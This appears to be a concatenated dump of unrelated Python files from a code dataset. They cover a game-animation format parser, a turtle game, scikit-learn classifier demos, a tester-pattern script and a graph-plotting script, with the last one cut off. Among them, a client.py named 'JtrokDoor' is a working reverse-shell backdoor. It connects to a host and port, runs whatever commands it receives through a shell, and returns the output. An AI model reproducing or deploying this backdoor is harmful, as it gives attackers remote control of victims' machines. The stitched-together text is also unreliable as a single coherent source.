self.offsetJointsWeightArray, \\\n self.offsetUserChannelWeightArray, \\\n self.offsetFrameSetDmaArray, \\\n self.offsetFrameSetInfoArray, \\\n self.offsetConstRData, \\\n self.offsetConstTData, \\\n self.offsetConstSData, \\\n self.offsetConstUserData, \\\n self.offsetPackingSpecs, \\\n self.offsetCustomData, \\\n self.sizeCustomData, \\\n self.offsetLocomotionDelta, \\\n self.channelTables0 = \\\n struct.unpack(('<', '>')[self.bigEndian] + 'I2f16H13IH', data[:98])\n\n self.offsetFrameSetDmaArray += 0x38\n self.offsetFrameSetInfoArray += 0x3C\n self.offsetConstRData += 0x40\n self.offsetConstTData += 0x44\n self.offsetConstSData += 0x48\n self.offsetConstUserData += 0x4C\n self.offsetPackingSpecs += 0x50\n\n\nclass EdgeAnimFrameSetInfo:\n def __init__(self, data, endianSwap):\n self.baseFrame , self.numIntraFrames = struct.unpack(('<', '>')[endianSwap] + 'HH', data[:4])\n\n\n#libedgeanimtool_animation\nclass Animation:\n def __init__(self):\n self.m_startTime = 0.0\n self.m_endTime = 0.0\n self.m_period = 0.0\n self.m_numFrames = 0\n \n self.m_enableLocoDelta = False\n self.m_locoDeltaQuat = None\n self.m_locoDeltaTrans = None\n \n self.m_jointAnimations = []\n self.m_userChannelAnimations = []\n\n self.m_enableWeights = None\n self.m_jointWeights = None\n self.m_userChannelWeights = None\n\n\n\nclass JointAnimation:\n def __init__(self):\n self.m_jointName = None\n self.m_jointWeight = None\n \n self.m_rotationAnimation = []\n self.m_translationAnimation = []\n self.m_scaleAnimation = []\n\n\nclass JointFrameSet:\n def __init__(self):\n self.m_initialRData = None\n self.m_initialTData = None\n self.m_initialSData = None\n \n self.m_intraRDataFrames = None\n self.m_intraTDataFrames = None\n self.m_intraSDataFrames = None\n \n self.m_hasRFrame = None\n self.m_hasTFrame = None\n self.m_hasSFrame = None\n\n\nclass UserChannelAnimation:\n def __init__(self):\n self.m_nodeName = None\n self.m_channelName = None\n self.m_weight = None\n \n self.m_animation = []\n\n\nclass UserChannelFrameSet:\n def __init__(self):\n self.m_initialData = None\n self.m_intraDataFrames = None\n self.m_hasFrame = None\n\n\nclass FrameSet:\n def __init__(self):\n self.m_baseFrame = None\n self.m_numIntraFrames = None\n\n\nclass EdgeAnimCompressionType:\n COMPRESSION_TYPE_NONE = 0\n COMPRESSION_TYPE_SMALLEST_3 = 1\n COMPRESSION_TYPE_BITPACKED = 2\n\n\nclass CompressionInfo:\n def __init__(self):\n self.m_maxEvalBufferSize = None\n \n self.m_compressionTypeRotation = EdgeAnimCompressionType.COMPRESSION_TYPE_SMALLEST_3\n self.m_compressionTypeTranslation = EdgeAnimCompressionType.COMPRESSION_TYPE_NONE\n self.m_compressionTypeScale = EdgeAnimCompressionType.COMPRESSION_TYPE_NONE\n self.m_compressionTypeUser = EdgeAnimCompressionType.COMPRESSION_TYPE_NONE\n \n self.m_defaultToleranceRotation = 0.001\n self.m_defaultToleranceTranslation = 0.001\n self.m_defaultToleranceScale = 0.001\n self.m_defaultToleranceUser = 0.001\n \n self.m_jointTolerancesRotation = None\n self.m_jointTolerancesTranslation = None\n self.m_jointTolerancesScale = None\n self.m_userChannelTolerances = None\n\n\nclass CompressedFrameSet:\n def __init__(self):\n self.m_baseFrame = None\n self.m_numIntraFrames = None\n \n self.m_initialRRaw = []\n self.m_initialRSmallest3 = []\n self.m_initialTRaw = []\n self.m_initialSRaw = []\n self.m_initialURaw = []\n \n self.m_initialRBitpacked = None\n self.m_initialTBitpacked = None\n self.m_initialSBitpacked = None\n self.m_initialUBitpacked = None\n \n self.m_intraBits = b''\n \n self.m_intraRRaw = []\n 
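# Field naming mirrors EdgeAnimCompressionType: *Raw fields hold uncompressed keys, *Smallest3 quaternion smallest-three data, and *Bitpacked the bit-packed streams described by KeyframePackingSpec.\n 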
self.m_intraRSmallest3 = []\n self.m_intraTRaw = []\n self.m_intraSRaw = []\n self.m_intraURaw = []\n \n self.m_intraRBitpacked = None\n self.m_intraTBitpacked = None\n self.m_intraSBitpacked = None\n self.m_intraUBitpacked = None\n\n\nclass CompressedAnimation:\n def __init__(self):\n self.m_duration = None\n self.m_sampleFrequency = None\n self.m_numJoints = None\n self.m_numUserChannels = None\n self.m_numFrames = None\n self.m_numFrameSets = None\n self.m_evalBufferSizeRequired = None\n \n self.m_enableLocoDelta = None\n self.m_locoDeltaQuat = None\n self.m_locoDeltaTrans = None\n \n self.m_customData = None\n \n self.m_enableWeights = None\n self.m_jointWeights = None\n self.m_userChannelWeights = None\n \n self.m_numConstRChannels = None\n self.m_numConstTChannels = None\n self.m_numConstSChannels = None\n self.m_numConstUChannels = None\n self.m_numAnimRChannels = None\n self.m_numAnimTChannels = None\n self.m_numAnimSChannels = None\n self.m_numAnimUChannels = None\n \n self.m_compressionInfo = None\n \n self.m_packingSpecsR = []\n self.m_packingSpecsT = []\n self.m_packingSpecsS = []\n self.m_packingSpecsU = []\n \n self.m_constRChannels = None\n self.m_constTChannels = None\n self.m_constSChannels = None\n self.m_constUChannels = None\n self.m_animRChannels = None\n self.m_animTChannels = None\n self.m_animSChannels = None\n self.m_animUChannels = None\n \n self.m_constRRaw = []\n self.m_constRSmallest3 = []\n self.m_constTRaw = []\n self.m_constSRaw = []\n self.m_constURaw = []\n \n self.m_constRBitpacked = None\n self.m_constTBitpacked = None\n self.m_constSBitpacked = None\n self.m_constUBitpacked = None\n \n self.m_frameSets = []\n\n\n#libedgeanimtool_common\nclass Joint:\n def __init__(self, data, bigEndian = False):\n self.m_rotation = struct.unpack(('<', '>')[bigEndian] + '4f', data[:16])\n self.m_translation = struct.unpack(('<', '>')[bigEndian] + '4f', data[16:32])\n self.m_scale = struct.unpack(('<', '>')[bigEndian] + '4f', data[32:48])\n\ndef Reverse(input, endianSwap): #Fuck! How can I tell it's short???? 
Gonna ignore this for now lol, no one uses Big Endian\n return input\n # if endianSwap:\n # if isinstance(input, list):\n # for element in input:\n # element = Reverse(element, true)\n # else:\n\n\n#libedgeanimtool_bitpacking\nclass KeyframePackingSpec:\n def __init__(self, packedSpec):\n self.m_componentSpecs = [None, None, None]\n self.m_componentSpecs[0] = ComponentPackingSpec((packedSpec >> 31) & 1, (packedSpec >> 27) & 15, (packedSpec >> 22) & 31)\n self.m_componentSpecs[1] = ComponentPackingSpec((packedSpec >> 21) & 1, (packedSpec >> 17) & 15, (packedSpec >> 12) & 31)\n self.m_componentSpecs[2] = ComponentPackingSpec((packedSpec >> 11) & 1, (packedSpec >> 7) & 15, (packedSpec >> 2) & 31)\n self.m_recomputeComponentIdx = packedSpec & 3\n\n def GetNumBits(self):\n return self.m_componentSpecs[0].GetNumBits() + self.m_componentSpecs[1].GetNumBits() + self.m_componentSpecs[2].GetNumBits()\n\n\nclass ComponentPackingSpec:\n def __init__(self, s, e, m):\n self.m_numSignBits = s\n self.m_numExponentBits = e\n self.m_numMantissaBits = m\n\n def GetNumBits(self):\n return self.m_numSignBits + self.m_numExponentBits + self.m_numMantissaBits\n\n def Decode(self, bits):\n res = 0.0\n maskTable = [\n 0x00000000,\n 0x00000001, 0x00000003, 0x00000007, 0x0000000F,\n 0x0000001F, 0x0000003F, 0x0000007F, 0x000000FF,\n 0x000001FF, 0x000003FF, 0x000007FF, 0x00000FFF,\n 0x00001FFF, 0x00003FFF, 0x00007FFF, 0x0000FFFF,\n 0x0001FFFF, 0x0003FFFF, 0x0007FFFF, 0x000FFFFF,\n 0x001FFFFF, 0x003FFFFF, 0x007FFFFF, 0x00FFFFFF,\n 0x01FFFFFF, 0x03FFFFFF, 0x07FFFFFF, 0x0FFFFFFF,\n 0x1FFFFFFF, 0x3FFFFFFF, 0x7FFFFFFF, 0xFFFFFFFF]\n signMaskTable = [\n 0x00000001, 0x00000002, 0x00000004, 0x00000008,\n 0x00000010, 0x00000020, 0x00000040, 0x00000080,\n 0x00000100, 0x00000200, 0x00000400, 0x00000800,\n 0x00001000, 0x00002000, 0x00004000, 0x00008000,\n 0x00010000, 0x00020000, 0x00040000, 0x00080000,\n 0x00100000, 0x00200000, 0x00400000, 0x00800000,\n 0x01000000, 0x02000000, 0x04000000, 0x08000000,\n 0x10000000, 0x20000000, 0x40000000, 0x80000000]\n signExtendTable = [\n 0xFFFFFFFF, 0xFFFFFFFE, 0xFFFFFFFC, 0xFFFFFFF8,\n 0xFFFFFFF0, 0xFFFFFFE0, 0xFFFFFFC0, 0xFFFFFF80,\n 0xFFFFFF00, 0xFFFFFE00, 0xFFFFFC00, 0xFFFFF800,\n 0xFFFFF000, 0xFFFFE000, 0xFFFFC000, 0xFFFF8000,\n 0xFFFF0000, 0xFFFE0000, 0xFFFC0000, 0xFFF80000,\n 0xFFF00000, 0xFFE00000, 0xFFC00000, 0xFF800000,\n 0xFF000000, 0xFE000000, 0xFC000000, 0xF8000000,\n 0xF0000000, 0xE0000000, 0xC0000000, 0x80000000,\n 0x00000000]\n expBiasTable = [128, 127, 126, 124, 120, 112, 96, 64, 0, -128, -384]\n\n # Floating point mode\n if self.m_numExponentBits:\n m = bits & maskTable[self.m_numMantissaBits]\n e = struct.unpack('i', ((bits >> self.m_numMantissaBits) & maskTable[self.m_numExponentBits]).to_bytes(4, byteorder='little'))[0] #Not sure y it's int32 not uint32, just cast it in case\n s = (bits >> (self.m_numMantissaBits + self.m_numExponentBits)) & maskTable[self.m_numSignBits]\n\n if self.m_numExponentBits:\n e += expBiasTable[self.m_numExponentBits]\n\n if (self.m_numMantissaBits <= 23):\n m <<= (23 - self.m_numMantissaBits)\n else:\n m >>= self.m_numMantissaBits - 23\n\n # Clamp exponent - is it really necessary?\n if e > 0x7FFFFFF:\n e = 0\n m = 0\n s = 0\n elif e >= ( 1 << 8 ):\n e = ( 1 << 8 ) - 1\n m = 0xffffffff >> ( 32 - 23 )\n\n self.m_floatBits = 0\n self.m_floatBits |= s << 31\n self.m_floatBits |= e << 23\n self.m_floatBits |= m\n\n res = struct.unpack('f', self.m_floatBits.to_bytes(4, 'little'))[0]\n\n # Fixed point\n elif self.m_numMantissaBits:\n flim = 
maskTable[self.m_numMantissaBits]\n\n # Signed fixed point\n if self.m_numSignBits:\n # sign-extend if the sign bit is set\n val = bits\n if val & signMaskTable[self.m_numMantissaBits]:\n val |= signExtendTable[self.m_numMantissaBits]\n val = struct.unpack('i', val.to_bytes(4, byteorder='little'))[0]\n res = val / flim\n else: # Unsigned fixed point\n res = bits / flim\n # print(\"Decode - %d -> %f (%d, %d, %d)\" % (bits, res, self.m_numSignBits, self.m_numExponentBits, self.m_numMantissaBits))\n return res\n\n\n#edge_dma\nclass EdgeDmaListElement:\n def __init__(self, data, endianSwap):\n self.size, self.eal = struct.unpack(('<', '>')[endianSwap] + 'II', data[:8])\n\n\n","repo_name":"Team-Alua/Noesis-EdgeLib","sub_path":"EdgeData20.py","file_name":"EdgeData20.py","file_ext":"py","file_size_in_byte":15347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5317222159","text":"import time\nfrom turtle import Screen\nfrom player import Player\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\nplayer = Player()\ncar_manager = CarManager()\nscore_board = Scoreboard()\n\nScreen().listen()\nScreen().onkey(fun=player.move_forward, key=\"Up\")\n\ngame_is_on = True\n\nwhile game_is_on:\n time.sleep(player.level)\n screen.update()\n car_manager.create_car()\n\n# Step 1 Turtle: Creation, Movement, and reset.\n if player.ycor() > 280:\n player.reset()\n score_board.level_up()\n\n\n# Step 2 Creation of cars, Movement and deletion.\n for car in car_manager.all_cars:\n car_manager.move(car)\n# Step 3 increase speed of cars when turtle is reset.\n # DONE\n# Step 3 Collision with turtle and car: end game\n for car in car_manager.all_cars:\n if (player.ycor() > car.ycor() - 20 and player.ycor() < car.ycor() + 20 and player.xcor() > car.xcor() - 20\n and player.xcor() < car.xcor() + 20):\n score_board.game_over()\n game_is_on = False\n\n# Step 4 Scoreboard: increase when turtle is reset.\n\n\nscreen.exitonclick()\n\n\n\n\n\n\n\n\n","repo_name":"ahes0001/100_Days_Of_Python","sub_path":"Day_23_Turtle_Crossing_Captone/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32403558457","text":"from sklearn import datasets\nimport matplotlib.pyplot as plt\nfrom plot_decision_regions import plot_decision_regions\nimport numpy as np\n# Load the Iris dataset\niris = datasets.load_iris()\n# Extract the features in the 3rd and 4th columns\nX = iris.data[:, [2, 3]]\n# Get the class labels\ny = iris.target\n\nfrom sklearn.cross_validation import train_test_split\n# Split into training and test data\n# Use 30% of the whole set as test data\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, random_state=0)\n\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\n# Compute the mean and standard deviation of the training data\nsc.fit(X_train)\n# Standardize using the mean and standard deviation\nX_train_std = sc.transform(X_train)\nX_test_std = sc.transform(X_test)\n\nfrom sklearn.linear_model import Perceptron\nppn = Perceptron(n_iter=40, eta0=0.1, random_state=0, shuffle=True)\n# Fit the model to the training data\nppn.fit(X_train_std, y_train)\n\n# Run predictions on the test data\ny_pred = ppn.predict(X_test_std)\nprint('Misclassified samples: %d' % (y_test != y_pred).sum())\n\nfrom sklearn.metrics import accuracy_score\n# Print the classification accuracy\nprint('Accuracy: %.2f' % accuracy_score(y_test, y_pred))\n\n# Stack the training and test features row-wise\nX_combined_std = np.vstack((X_train_std, X_test_std))\n# Concatenate the training and test class labels\ny_combined = np.hstack((y_train, y_test))\n# Plot the decision regions\nplot_decision_regions(X=X_combined_std, y=y_combined, classifier=ppn, test_idx=range(105,150))\n\nplt.xlabel('petal length [standardized]')\nplt.ylabel('petal width [standardized]')\n# Configure the legend (placed in the upper left)\nplt.legend(loc='upper left')\nplt.show()\n","repo_name":"kazuhei/python-machine-larning-edu","sub_path":"chapter3/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21292516150","text":"import pandas as pd\r\ndata = pd.read_csv('regression_dataset.csv')\r\n\r\nX=data.loc[:, data.columns != 'y']\r\nY=data['y']\r\n\r\n\r\nfrom sklearn.utils import shuffle\r\ndata= shuffle(data).reset_index(drop=True)\r\nX=data.loc[:, data.columns != 'y']\r\nY=data['y']\r\nfrom sklearn.model_selection import train_test_split\r\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.25, random_state=100)\r\nprint ('Number of samples in training data:',len(x_train))\r\nprint ('Number of samples in validation data:',len(x_test))\r\n#train logistic regression\r\nfrom sklearn import linear_model\r\nlogreg_model = linear_model.LogisticRegression()\r\nprint ('Training a logistic Regression Model..')\r\nlogreg_model.fit(x_train, y_train)\r\ntraining_accuracy= round(logreg_model.score(x_train, y_train) * 100, 2)\r\nprint('Accuracy of the model on training data: ',training_accuracy)\r\ntest_accuracy=round(logreg_model.score(x_test, y_test) * 100, 2)\r\nprint('Accuracy of the model on test data: ',test_accuracy)\r\nparameters = logreg_model.get_params()\r\nprint('parameters of this model:\\n',parameters)\r\ncoefficients = logreg_model.coef_\r\nprint('coefficients of this model:\\n',coefficients)\r\ninterceptions = logreg_model.intercept_\r\nprint('interceptions of this model:\\n',interceptions)\r\n\r\nfrom sklearn import svm\r\nsvc = svm.SVC()\r\nprint ('Training a SVM Model..')\r\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=100)\r\nsvc.fit(x_train, y_train)\r\ntraining_accuracy= round(svc.score(x_train, y_train) * 100, 2)\r\nprint('Accuracy of the model on training data: ',training_accuracy)\r\ntest_accuracy= round(svc.score(x_test, y_test) * 100, 2)\r\nprint('Accuracy of the model on test data: ',test_accuracy)\r\n\r\nfrom sklearn import linear_model\r\nperceptron_model=linear_model.Perceptron()\r\nprint ('Training a perceptron Model..')\r\nperceptron_model.fit(x_train, y_train)\r\ntraining_accuracy=round(perceptron_model.score(x_train, y_train) * 100, 2)\r\nprint('Accuracy of the model on training data: ',training_accuracy)\r\ntest_accuracy=round(perceptron_model.score(x_test, y_test) * 100, 2)\r\nprint('Accuracy of the model on test data: ',test_accuracy)\r\n\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nknn = KNeighborsClassifier(n_neighbors = 3)\r\nknn.fit(x_train, y_train)\r\nprint ('Training a KNN Model..')\r\ntraining_accuracy= round(knn.score(x_train, y_train) * 100, 2)\r\nprint('Accuracy of the model on training data: ',training_accuracy)\r\ntest_accuracy= round(knn.score(x_test, y_test) * 100, 2)\r\nprint('Accuracy of the model on test data: ',test_accuracy)\r\n\r\nimport xgboost as xgb\r\nxgb_model = xgb.XGBClassifier(n_estimators=1000)\r\nprint ('Training a xgboost Model..')\r\nxgb_model.fit(x_train, y_train, eval_metric='mlogloss')\r\ntraining_accuracy=round(xgb_model.score(x_train, y_train) * 100, 
2)\r\nprint('Accuracy of the model on training data: ',training_accuracy)\r\ntest_accuracy=round(xgb_model.score(x_test, y_test) * 100, 2)\r\nprint('Accuracy of the model on test data: ',test_accuracy)\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nrandomforest_model = RandomForestClassifier(n_estimators=1000)\r\nprint ('Training a random forest Model..')\r\nrandomforest_model.fit(x_train, y_train)\r\ntraining_accuracy=round(randomforest_model.score(x_train, y_train) * 100, 2)\r\nprint('Accuracy of the model on training data: ',training_accuracy)\r\ntest_accuracy=round(randomforest_model.score(x_test, y_test) * 100, 2)\r\nprint('Accuracy of the model on test data: ',test_accuracy)\r\n","repo_name":"rebeccalysaght/DataXFinalProject","sub_path":"final_all_codes/code files/regression including logistic.py","file_name":"regression including logistic.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2439094317","text":"with Pattern(pin_header=\"cap_test\") as pat:\n    tester = origen.tester\n    portc = origen.dut.pin(\"portc\")\n    reg = origen.dut.reg1\n    dut().timeset('simple').symbol_map['A'] = 'A'\n    dut().timeset('simple').symbol_map['B'] = 'B'\n\n    tester.cc(\"Basics\")\n    tester.cc(\"---\")\n    tester.cc(\"Capture a single cycle\")\n    tester.capture().cycle()\n    tester.cycle()\n    tester.cc(\"Capture a single cycle on portc\")\n    tester.capture(pins=[\"portc\"]).cycle()\n    tester.cycle()\n    tester.cc(\"Capture two cycles on portc\")\n    tester.capture(pins=[\"portc\"], cycles=2).repeat(2)\n    tester.cc(\"Capture three cycles on portc with symbol 'A'\")\n    tester.capture(pins=[\"portc\"], cycles=3, symbol=\"A\").repeat(3)\n    tester.cc(\"Capture four cycles on portc with symbol 'B'\")\n    tester.capture(pins=[\"portc\"], cycles=4, symbol=\"B\").repeat(2)\n    tester.repeat(2)\n    tester.cc(\"Capture four cycles on portc and clk\")\n    tester.capture(pins=[\"portc\", \"clk\"], cycles=4).repeat(10)\n\n    tester.cc(\"Basics with implied pins (portc)\")\n    tester.cc(\"---\")\n    tester.cc(\"Capture next cycle (portc)\")\n    portc.capture(cycles=1).cycle()\n    tester.cycle()\n    tester.cc(\"Capture next two cycles (portc)\")\n    portc.capture(cycles=2).repeat(2)\n    tester.cycle()\n    tester.cc(\"Capture next two cycles with symbol 'A' (portc)\")\n    portc.capture(cycles=2, symbol=\"A\").repeat(2)\n    tester.cycle()\n    tester.cc(\n        \"Capture next two cycles with symbol 'B' masking the second bit (portc)\"\n    )\n    portc.capture(cycles=2, symbol=\"B\", mask=0x2).repeat(2)\n    tester.cycle()\n\n    tester.cc(\"Two captures with symbols\")\n    tester.cc(\"---\")\n    tester.cc(\"This however, is fine.\")\n    portc.capture(cycles=2, symbol=\"A\").repeat(2)\n    portc.capture(cycles=2, symbol=\"B\").repeat(2)\n    tester.cycle()\n\n    origen.dut.arm_debug.switch_to_swd()\n    tester.cc(\"Capturing a register (using arm debug)\")\n    tester.cc(\"---\")\n    tester.cc(\"Capture 'reg1'\")\n    reg.capture()\n    tester.cc(\"Capture 'reg1' with symbol 'A'\")\n    reg.capture(symbol='A')\n    tester.cc(\"Capture 'reg1' with symbol 'B' and mask 0xFFFF\")\n    reg.capture(mask=0xFFFF, symbol='B')\n\n    # tester.cc(\"Verify with capture options\")\n    # tester.cc(\"---\")\n    # tester.cc(\"Verify 'reg1' with data 0 while capturing\")\n    reg.set_data(0xCECE_CECE)\n    # reg.verify(capture=True)\n    # tester.cc(\"Verify 'reg1' with data 0 while capturing with symbol 'A'\")\n    # reg.verify(capture={\"symbol\": 'A'})\n    # tester.cc(\"Verify 'reg1' with data 0 while capturing with symbol 'B' and mask 
0xFFFF\")\n # reg.verify(capture={\"symbol\": 'B', \"mask\": 0xFFFF})\n\n tester.cc(\n \"Verify with captures previously set. Next two transactions will be captured and verified\"\n )\n tester.cc(\"---\")\n tester.cc(\"Capture next two transactions\")\n reg.set_capture()\n reg.verify()\n reg.verify()\n reg.clear_capture()\n tester.cc(\"This should not be captured\")\n reg.verify()\n\n # Changing capture configuration\n with tester.eq(\"v93k\") as v93k:\n tester.cc(\"--Should only render on v39k--\")\n tester.cycle()\n # tester.capture_config.digcap.method = \"digcap\"\n # tester.capture_config.symbol = \"E\"\n # tester.capture(cycles=4)\n # tester.capture_config.digcap.method = None\n # tester.capture_config.symbol = None\n # tester.capture(cycles=4)\n\n # To Do: Capture with Options\n","repo_name":"Origen-SDK/o2","sub_path":"test_apps/python_app/example/patterns/captures.py","file_name":"captures.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"73092961764","text":"#!usr/bin/python3\nimport socket\nimport subprocess\n\n\nclass JtrokDoor:\n def __init__(self, host, port):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)\n self.sock.connect((host, port))\n\n def execute(self, command):\n return subprocess.check_output(command, shell=True)\n\n def run(self):\n while True:\n command = self.sock.recv(1024)\n cmd_result = self.execute(command)\n self.sock.send(cmd_result)\n\n sock.close()\n\n\njtro_door = JtrokDoor('127.0.0.1', 4545)\njtro_door.run()\n","repo_name":"jakiiii/jTro","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24850786103","text":"import itertools\nimport pickle\nimport random\nimport matplotlib\nimport networkx as nx\n\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\nfrom config import *\n\n\ndef plot(nodes, edges, group, suffix):\n\tcolors = [(0, 'w'), (1, 'r'), (2, 'g'), (3, 'b'), (4, 'y')]\n\tG = nx.Graph()\n\tG.add_nodes_from(nodes)\n\tG.add_edges_from(edges)\n\tpos = nx.spring_layout(G)\n\n\tnx.draw_networkx_nodes(G, pos, nodelist=[node for node in nodes if node not in group], node_color='w', node_size=120)\n\tfor g_id, color in colors:\n\t\tnx.draw_networkx_nodes(G, pos, nodelist=[node for node in nodes if node in group and group[node] == g_id],\n\t\t node_color=color, node_size=600)\n\tnx.draw_networkx_edges(G, pos,\n\t edgelist=[edge for edge in edges if edge[0] in graph.author_labels and edge[1] in graph.author_labels], width=4.0)\n\tnx.draw_networkx_edges(G, pos,\n\t edgelist=[edge for edge in edges if edge[0] not in graph.author_labels or edge[1] not in graph.author_labels], width=1.0)\n\tnx.draw_networkx_labels(G, pos, labels={node: node for node in nodes if node in graph.author_labels}, font_size=20)\n\tnx.draw_networkx_labels(G, pos, labels={node: node for node in nodes if node not in graph.author_labels}, font_size=12)\n\tplt.tight_layout()\n\taxis = plt.gca()\n\taxis.axes.get_xaxis().set_visible(False)\n\taxis.axes.get_yaxis().set_visible(False)\n\tplt.savefig(output_directory + suffix + '.png', dpi=200)\n\tplt.close()\n\n\n\ndef read_graph(suffix):\n\twith open(cwd + 'nodes_' + suffix + '.pkl', 'rb') as f:\n\t\tnodes = pickle.load(f)\n\twith open(cwd + 'edges_' + suffix + '.pkl', 'rb') as f:\n\t\tedges = pickle.load(f)\n\treturn nodes, 
edges\n\n\ndef read_test():\n\ttest_authors = defaultdict(set)\n\twith open(args.test_file) as f:\n\t\tfor line in f:\n\t\t\tsplits = line.rstrip().split('\\t')\n\t\t\ttest_authors[splits[0].replace('_', ' ')] = int(splits[1])\n\treturn test_authors\n\n\nclass Network(object):\n\tdef __init__(self):\n\t\tnodes_baseline, edges_baseline = read_graph('baseline')\n\t\tnodes_rl, edges_rl = read_graph('rl')\n\t\tself.author_labels = read_test()\n\n\t\tself.neighbors_baseline = {node: set() for node in nodes_baseline}\n\t\tself.neighbors_rl = {node: set() for node in nodes_rl}\n\n\t\tfor edge in edges_baseline:\n\t\t\tself.neighbors_baseline[edge[0]].add(edge[1])\n\t\t\tself.neighbors_baseline[edge[1]].add(edge[0])\n\n\t\tfor edge in edges_rl:\n\t\t\tself.neighbors_rl[edge[0]].add(edge[1])\n\t\t\tself.neighbors_rl[edge[1]].add(edge[0])\n\n\t\tself.dangling = set([node for node in self.neighbors_baseline if not bool(self.neighbors_baseline[node])])\n\t\tself.connected = set([node for node in self.neighbors_rl if bool(self.neighbors_rl[node] & self.dangling)]) | self.dangling\n\n\n\tdef edges(self, nodes):\n\t\tedges = set()\n\t\tfor node, neighbors in self.neighbors_rl.items():\n\t\t\tif node in nodes:\n\t\t\t\tintersect = neighbors & nodes\n\t\t\t\tif bool(intersect):\n\t\t\t\t\tfor neighbor in intersect:\n\t\t\t\t\t\tself.add_edge(edges, node, neighbor)\n\t\treturn edges\n\n\tdef colored(self):\n\t\treturn set(self.neighbors_baseline.keys())\n\n\tdef is_connected(self, n1, n2, order=0):\n\t\tif order == 0:\n\t\t\treturn n1 == n2\n\t\tif len(self.neighbors_baseline[n1]) == 0:\n\t\t\treturn False\n\t\treturn reduce(lambda x, y: x or y, [self.is_connected(n, n2, order - 1) for n in self.neighbors_baseline[n1]])\n\n\tdef baseline(self):\n\t\t# black_list = set()\n\t\tblack_list = set(['Yizhou Sun', 'Jing Gao', 'Dong Xin', 'Wei Wang', 'Wei Lu', 'Manish Gupta', 'Hong Cheng', 'Wenmin Li', 'Chen Chen'])\n\t\tnodes = set()\n\t\tcolored = self.colored()\n\t\tfor node, nbs in self.neighbors_rl.items():\n\t\t\tif node in black_list:\n\t\t\t\tcontinue\n\t\t\tneighbors = nbs & colored\n\t\t\tif node not in self.neighbors_baseline:\n\t\t\t\tfor pair in itertools.combinations(neighbors, 2):\n\t\t\t\t\tif pair[0] in black_list or pair[1] in black_list:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif self.author_labels[pair[0]] == self.author_labels[pair[1]]:\n\t\t\t\t\t\tif not self.is_connected(pair[0], pair[1], 4):\n\t\t\t\t\t\t\tnodes.add(pair[0])\n\t\t\t\t\t\t\tnodes.add(pair[1])\n\t\t\telse:\n\t\t\t\tfor neighbor in neighbors:\n\t\t\t\t\tif neighbor in black_list:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif self.author_labels[node] != self.author_labels[neighbor]:\n\t\t\t\t\t\tnodes.add(node)\n\t\t\t\t\t\tnodes.add(neighbor)\n\t\tedges = self.edges(nodes)\n\t\treturn list(nodes), list(edges)\n\n\tdef add_edge(self, edges, n1, n2):\n\t\tif (n1, n2) not in edges and (n2, n1) not in edges:\n\t\t\tedges.add((n1, n2))\n\n\tdef rl1(self, baseline_nodes, baseline_edges):\n\t\tcolored = self.colored()\n\t\tnodes = set()\n\t\tedges = set()\n\t\tfor (n1, n2) in itertools.combinations(baseline_nodes, 2):\n\t\t\tif self.author_labels[n1] == self.author_labels[n2] and n2 not in self.neighbors_baseline[n1]:\n\t\t\t\tintersect = self.neighbors_rl[n1] & self.neighbors_rl[n2]\n\t\t\t\tif bool(intersect):\n\t\t\t\t\tnodes.add(n1)\n\t\t\t\t\tnodes.add(n2)\n\t\t\t\tfor nb in intersect:\n\t\t\t\t\tif nb not in colored:\n\t\t\t\t\t\tnodes.add(nb)\n\t\t\t\t\t\tself.add_edge(edges, n1, nb)\n\t\t\t\t\t\tself.add_edge(edges, n2, nb)\n\t\tfor edge in 
baseline_edges:\n\t\t\tif self.author_labels[edge[0]] == self.author_labels[edge[1]]:\n\t\t\t\tedges.add(edge)\n\t\treturn list(nodes), list(edges)\n\n\tdef rl2(self, baseline_nodes, baseline_edges):\n\t\tcolored = self.colored()\n\t\tnodes = set()\n\t\tedges = set()\n\t\tfor edge in baseline_edges:\n\t\t\tif self.author_labels[edge[0]] != self.author_labels[edge[1]]:\n\t\t\t\tnodes.add(edge[0])\n\t\t\t\tnodes.add(edge[1])\n\t\t\t\tedges.add(edge)\n\t\t\t\tnbs1 = self.neighbors_rl[edge[0]] - colored\n\t\t\t\tnbs2 = self.neighbors_rl[edge[1]] - colored\n\t\t\t\tfor nb1 in nbs1:\n\t\t\t\t\tratio = 4.0 / len(nbs1)\n\t\t\t\t\tif random.uniform(0, 1) < ratio:\n\t\t\t\t\t\tnodes.add(nb1)\n\t\t\t\t\t\tself.add_edge(edges, edge[0], nb1)\n\t\t\t\tfor nb2 in nbs2:\n\t\t\t\t\tratio = 4.0 / len(nbs2)\n\t\t\t\t\tif random.uniform(0, 1) < ratio:\n\t\t\t\t\t\tnodes.add(nb2)\n\t\t\t\t\t\tself.add_edge(edges, edge[1], nb2)\n\t\treturn list(nodes), list(edges)\n\n\tdef rl3(self, baseline_nodes, baseline_edges):\n\t\treturn None, None\n\n\nif __name__ == '__main__':\n\tcwd = 'data/'\n\toutput_directory = 'plot/'\n\tgraph = 